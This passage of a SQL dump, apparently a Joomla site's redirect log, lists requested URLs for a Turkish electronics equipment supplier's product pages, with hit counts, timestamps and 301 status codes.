00:00:00',301),(4270,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=155&Itemid=81','','https://www.google.com.tr/','',1,0,'2014-08-23 15:46:52','0000-00-00 00:00:00',301),(4271,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr&limitstart=10','','','',6,0,'2014-08-23 15:59:03','0000-00-00 00:00:00',301),(4272,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=164&Itemid=160&lang=en','','','',1,0,'2014-08-23 16:02:33','0000-00-00 00:00:00',301),(4273,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146','','','',2,0,'2014-08-23 16:08:20','0000-00-00 00:00:00',301),(4274,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28','','','',3,0,'2014-08-23 16:10:12','0000-00-00 00:00:00',301),(4275,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=0&lang=en','','','',1,0,'2014-08-23 16:18:06','0000-00-00 00:00:00',301),(4276,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=en','','','',2,0,'2014-08-23 16:18:39','0000-00-00 00:00:00',301),(4277,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=en','','','',3,0,'2014-08-23 16:21:20','0000-00-00 00:00:00',301),(4278,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=en','','','',3,0,'2014-08-23 16:38:14','0000-00-00 00:00:00',301),(4279,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164&Itemid=160&lang=en','','','',3,0,'2014-08-23 16:38:24','0000-00-00 00:00:00',301),(4280,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=tr','','','',2,0,'2014-08-23 16:46:05','0000-00-00 00:00:00',301),(4281,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27','','','',7,0,'2014-08-23 16:54:45','0000-00-00 00:00:00',301),(4282,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&Itemid=133','','','',5,0,'2014-08-23 17:05:52','0000-00-00 00:00:00',301),(4283,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=en','','','',6,0,'2014-08-23 17:11:56','0000-00-00 00:00:00',301),(4284,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=166&Itemid=144&lang=tr','','','',1,0,'2014-08-23 17:18:46','0000-00-00 00:00:00',301),(4285,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=141&Itemid=143&lang=tr','','','',1,0,'2014-08-23 17:41:13','0000-00-00 00:00:00',301),(4286,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55','','','',7,0,'2014-08-23 17:49:54','0000-00-00 00:00:00',301),(4287,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60','','','',6,0,'2014-08-23 17:51:18','0000-00-00 00:00:00',301),(4288,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=44&Itemid=0&lang=en','','','',1,0,'2014-08-23 17:52:10','0000-00-00 00:00:00',301),(4289,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=tr','','','',9,0,'2014-08-23 17:55:33','0000-00-00 00:00:00',301),(4290,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=tr','','','',2,0,'2014-08-23 17:57:20','0000-00-00 00:00:00',301),(4291,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&Itemid=130&lang=en','','','',2,0,'2014-08-23 18:01:11','0000-00-00 00:00:00',301),(4292,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=166%3Alfs-1&catid=44%3Apota&Itemid=144&lang=tr','','','',2,0,'2014-08-23 18:05:58','0000-00-00 00:00:00',301),(4293,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=0&lang=tr','','','',1,0,'2014-08-23 18:11:17','0000-00-00 00:00:00',301),(4294,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default','','','',6,0,'2014-08-23 18:27:52','0000-00-00 00:00:00',301),(4295,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143','','','',2,0,'2014-08-23 18:28:50','0000-00-00 00:00:00',301),(4296,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=en','','https://www.google.dz/','',1,0,'2014-08-23 18:29:59','0000-00-00 00:00:00',301),(4297,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=en','','','',2,0,'2014-08-23 18:32:05','0000-00-00 00:00:00',301),(4298,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=tr','','','',3,0,'2014-08-23 18:33:29','0000-00-00 00:00:00',301),(4299,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=114','','','',9,0,'2014-08-23 18:36:18','0000-00-00 00:00:00',301),(4300,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en','','','',9,0,'2014-08-23 18:37:43','0000-00-00 00:00:00',301),(4301,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&Itemid=134','','','',6,0,'2014-08-23 18:39:08','0000-00-00 00:00:00',301),(4302,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=en','','','',6,0,'2014-08-23 18:47:33','0000-00-00 00:00:00',301),(4303,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=en','','','',6,0,'2014-08-23 18:48:57','0000-00-00 00:00:00',301),(4304,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116','','','',3,0,'2014-08-23 18:55:59','0000-00-00 00:00:00',301),(4305,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=en','','','',6,0,'2014-08-23 19:01:44','0000-00-00 00:00:00',301),(4306,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167&Itemid=163','','','',5,0,'2014-08-23 19:03:03','0000-00-00 00:00:00',301),(4307,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=en','','','',8,0,'2014-08-23 19:07:14','0000-00-00 00:00:00',301),(4308,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default','','','',2,0,'2014-08-23 19:08:43','0000-00-00 00:00:00',301),(4309,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148','','','',6,0,'2014-08-23 19:19:59','0000-00-00 00:00:00',301),(4310,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143','','','',1,0,'2014-08-23 19:24:55','0000-00-00 00:00:00',301),(4311,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default','','','',1,0,'2014-08-23 19:36:50','0000-00-00 00:00:00',301),(4312,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default','','','',2,0,'2014-08-23 19:45:16','0000-00-00 00:00:00',301),(4313,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&limitstart=5','','','',1,0,'2014-08-23 19:48:15','0000-00-00 00:00:00',301),(4314,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=en','','','',3,0,'2014-08-23 19:52:18','0000-00-00 00:00:00',301),(4315,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109&Itemid=120','','','',5,0,'2014-08-23 19:53:42','0000-00-00 00:00:00',301),(4316,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127','','','',7,0,'2014-08-23 19:59:20','0000-00-00 00:00:00',301),(4317,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117&Itemid=128&lang=en','','','',2,0,'2014-08-23 20:02:09','0000-00-00 00:00:00',301),(4318,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122&Itemid=129','','','',1,0,'2014-08-23 20:30:16','0000-00-00 00:00:00',301),(4319,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117','','','',6,0,'2014-08-23 20:35:54','0000-00-00 00:00:00',301),(4320,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=41&Itemid=&lang=en','','','',1,0,'2014-08-23 20:36:42','0000-00-00 00:00:00',301),(4321,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138&Itemid=140','','','',3,0,'2014-08-23 20:54:10','0000-00-00 00:00:00',301),(4322,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=tr','','','',3,0,'2014-08-23 21:02:37','0000-00-00 00:00:00',301),(4323,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55&Itemid=1','','','',6,0,'2014-08-23 21:11:03','0000-00-00 00:00:00',301),(4324,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155','','','',7,0,'2014-08-23 21:18:05','0000-00-00 00:00:00',301),(4325,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default','','','',1,0,'2014-08-23 21:29:20','0000-00-00 00:00:00',301),(4326,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default','','','',2,0,'2014-08-23 21:39:11','0000-00-00 00:00:00',301),(4327,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=tr','','','',6,0,'2014-08-23 21:46:13','0000-00-00 00:00:00',301),(4328,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default','','','',2,0,'2014-08-23 21:54:38','0000-00-00 00:00:00',301),(4329,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=&lang=en','','','',1,0,'2014-08-23 21:55:24','0000-00-00 00:00:00',301),(4330,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr','','','',6,0,'2014-08-23 21:58:52','0000-00-00 00:00:00',301),(4331,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113','','','',3,0,'2014-08-23 22:01:40','0000-00-00 00:00:00',301),(4332,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159&Itemid=162&lang=en','','','',3,0,'2014-08-23 22:52:18','0000-00-00 00:00:00',301),(4333,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default','','','',3,0,'2014-08-23 22:56:31','0000-00-00 00:00:00',301),(4334,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=0&lang=tr','','','',1,0,'2014-08-23 23:47:58','0000-00-00 00:00:00',301),(4335,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default','','','',10,0,'2014-08-23 23:54:47','0000-00-00 00:00:00',301),(4336,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&Itemid=164&lang=en','','','',3,0,'2014-08-24 01:03:09','0000-00-00 00:00:00',301),(4337,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/welcome.html','','','',15,0,'2014-08-24 01:26:05','0000-00-00 00:00:00',301),(4338,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154&Itemid=156','','','',2,0,'2014-08-24 01:43:05','0000-00-00 00:00:00',301),(4339,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=en','','','',4,0,'2014-08-24 01:53:43','0000-00-00 00:00:00',301),(4340,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=en','','','',2,0,'2014-08-24 02:02:11','0000-00-00 00:00:00',301),(4341,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163','','','',2,0,'2014-08-24 02:51:21','0000-00-00 00:00:00',301),(4342,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138','','','',1,0,'2014-08-24 02:52:45','0000-00-00 00:00:00',301),(4343,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/templates/atomic/images/stories/food.php?rf','','','',1,0,'2014-08-24 04:36:10','0000-00-00 00:00:00',301),(4344,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=en','','','',3,0,'2014-08-24 04:49:28','0000-00-00 00:00:00',301),(4345,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=40&Itemid=60&lang=tr&limitstart=10','','','',2,0,'2014-08-24 05:08:46','0000-00-00 00:00:00',301),(4346,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146&Itemid=148&lang=tr','','','',2,0,'2014-08-24 05:20:25','0000-00-00 00:00:00',301),(4347,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=97&Itemid=108&lang=en','','','',3,0,'2014-08-24 06:33:01','0000-00-00 00:00:00',301),(4348,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=156&Itemid=157&lang=en','','','',5,0,'2014-08-24 08:52:55','0000-00-00 00:00:00',301),(4349,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=157&Itemid=158&lang=en','','','',6,0,'2014-08-24 08:53:00','0000-00-00 00:00:00',301),(4350,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=158&Itemid=159&lang=en','','','',6,0,'2014-08-24 08:53:06','0000-00-00 00:00:00',301),(4351,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=166&Itemid=144&lang=en','','','',6,0,'2014-08-24 08:53:12','0000-00-00 00:00:00',301),(4352,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=0&lang=en','','','',1,0,'2014-08-24 10:39:37','0000-00-00 00:00:00',301),(4353,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=0&lang=en','','','',1,0,'2014-08-24 11:20:25','0000-00-00 00:00:00',301),(4354,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=&lang=tr','','','',1,0,'2014-08-24 11:31:57','0000-00-00 00:00:00',301),(4355,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&Itemid=58&lang=en','','','',1,0,'2014-08-24 11:52:02','0000-00-00 00:00:00',301),(4356,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143','','','',1,0,'2014-08-24 12:59:48','0000-00-00 00:00:00',301),(4357,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=0&lang=en','','','',1,0,'2014-08-24 13:35:01','0000-00-00 00:00:00',301),(4358,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122','','','',2,0,'2014-08-24 13:57:17','0000-00-00 00:00:00',301),(4359,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167&Itemid=163&lang=tr','','','',3,0,'2014-08-24 14:10:05','0000-00-00 00:00:00',301),(4360,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=&lang=tr','','','',1,0,'2014-08-24 14:56:09','0000-00-00 00:00:00',301),(4361,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=tr','','','',4,0,'2014-08-24 15:02:12','0000-00-00 00:00:00',301),(4362,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=tr','','','',3,0,'2014-08-24 15:02:35','0000-00-00 00:00:00',301),(4363,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112&Itemid=123&lang=en','','','',2,0,'2014-08-24 15:35:16','0000-00-00 00:00:00',301),(4364,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=en','','','',4,0,'2014-08-24 15:47:10','0000-00-00 00:00:00',301),(4365,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=0&lang=tr','','','',1,0,'2014-08-24 15:55:29','0000-00-00 00:00:00',301),(4366,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=&lang=en','','','',1,0,'2014-08-24 16:10:27','0000-00-00 00:00:00',301),(4367,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=83&Itemid=95&lang=tr','','','',4,0,'2014-08-24 16:24:44','0000-00-00 00:00:00',301),(4368,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147&Itemid=146&lang=en','','','',1,0,'2014-08-24 16:51:39','0000-00-00 00:00:00',301),(4369,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=0&lang=tr','','','',1,0,'2014-08-24 16:56:19','0000-00-00 00:00:00',301),(4370,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=&lang=tr','','','',1,0,'2014-08-24 16:57:58','0000-00-00 00:00:00',301),(4371,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=56&lang=en','','','',2,0,'2014-08-24 17:26:41','0000-00-00 00:00:00',301),(4372,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120','','','',2,0,'2014-08-24 17:43:37','0000-00-00 00:00:00',301),(4373,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=tr','','','',7,0,'2014-08-24 17:44:13','0000-00-00 00:00:00',301),(4374,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=0&lang=tr','','','',1,0,'2014-08-24 18:31:34','0000-00-00 00:00:00',301),(4375,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=0&lang=en','','','',1,0,'2014-08-24 19:12:14','0000-00-00 00:00:00',301),(4376,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=&lang=en','','','',1,0,'2014-08-24 20:37:37','0000-00-00 00:00:00',301),(4377,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=en','','','',4,0,'2014-08-24 20:54:30','0000-00-00 00:00:00',301),(4378,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=tr','','','',8,0,'2014-08-24 21:01:15','0000-00-00 00:00:00',301),(4379,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=tr','','','',6,0,'2014-08-24 22:01:02','0000-00-00 00:00:00',301),(4380,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=&lang=tr','','','',1,0,'2014-08-24 22:01:23','0000-00-00 00:00:00',301),(4381,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=en','','','',1,0,'2014-08-24 22:56:51','0000-00-00 00:00:00',301),(4382,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=0&lang=en','','','',2,0,'2014-08-24 23:27:41','0000-00-00 00:00:00',301),(4383,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=&lang=tr','','','',2,0,'2014-08-25 00:13:27','0000-00-00 00:00:00',301),(4384,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=0&lang=en','','','',2,0,'2014-08-25 00:19:02','0000-00-00 00:00:00',301),(4385,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=0&lang=en','','','',1,0,'2014-08-25 00:39:44','0000-00-00 00:00:00',301),(4386,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=0&lang=tr','','','',1,0,'2014-08-25 01:31:05','0000-00-00 00:00:00',301),(4387,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=&lang=tr','','','',1,0,'2014-08-25 02:47:42','0000-00-00 00:00:00',301),(4388,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=120&Itemid=116&lang=tr','','','',11,0,'2014-08-25 02:52:24','0000-00-00 00:00:00',301),(4389,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=tr','','','',1,0,'2014-08-25 02:52:24','0000-00-00 00:00:00',301),(4390,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=0&lang=tr','','','',1,0,'2014-08-25 02:56:35','0000-00-00 00:00:00',301),(4391,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=138&Itemid=140&lang=tr','','','',1,0,'2014-08-25 03:03:03','0000-00-00 00:00:00',301),(4392,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=0&lang=tr','','','',1,0,'2014-08-25 03:14:20','0000-00-00 00:00:00',301),(4393,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default','','','',2,0,'2014-08-25 03:21:31','0000-00-00 00:00:00',301),(4394,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=tr','','','',2,0,'2014-08-25 03:23:12','0000-00-00 00:00:00',301),(4395,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=tr','','','',1,0,'2014-08-25 03:44:15','0000-00-00 00:00:00',301),(4396,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120&Itemid=116&lang=tr','','','',1,0,'2014-08-25 03:45:37','0000-00-00 00:00:00',301),(4397,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=0&lang=tr','','','',1,0,'2014-08-25 03:57:05','0000-00-00 00:00:00',301),(4398,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=&lang=tr','','','',1,0,'2014-08-25 04:25:51','0000-00-00 00:00:00',301),(4399,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=90&Itemid=102&lang=en','','','',1,0,'2014-08-25 04:31:21','0000-00-00 00:00:00',301),(4400,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=98&Itemid=109&lang=tr','','','',1,0,'2014-08-25 04:43:22','0000-00-00 00:00:00',301),(4401,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=51&Itemid=&lang=tr','','','',1,0,'2014-08-25 04:48:38','0000-00-00 00:00:00',301),(4402,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&Itemid=102&lang=en','','','',2,0,'2014-08-25 05:00:17','0000-00-00 00:00:00',301),(4403,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=0&lang=en','','','',1,0,'2014-08-25 05:07:12','0000-00-00 00:00:00',301),(4404,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=tr','','','',8,0,'2014-08-25 06:54:28','0000-00-00 00:00:00',301),(4405,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=0&lang=tr','','','',3,0,'2014-08-25 07:15:18','0000-00-00 00:00:00',301),(4406,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=&lang=tr','','','',2,0,'2014-08-25 07:24:40','0000-00-00 00:00:00',301),(4407,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2&lang=tr','','','',2,0,'2014-08-25 07:54:29','0000-00-00 00:00:00',301),(4408,'http://www.3s-technologies.com.tr/index.php/tr/images/fancybox/fancy_shadow_n.png','','','',1,0,'2014-08-25 08:05:05','0000-00-00 00:00:00',301),(4409,'http://www.3s-technologies.com.tr/index.php/tr/images/fancybox/fancy_shadow_ne.png','','','',1,0,'2014-08-25 08:05:05','0000-00-00 00:00:00',301),(4410,'http://www.3s-technologies.com.tr/index.php/tr/images/fancybox/fancy_shadow_e.png','','','',1,0,'2014-08-25 08:05:05','0000-00-00 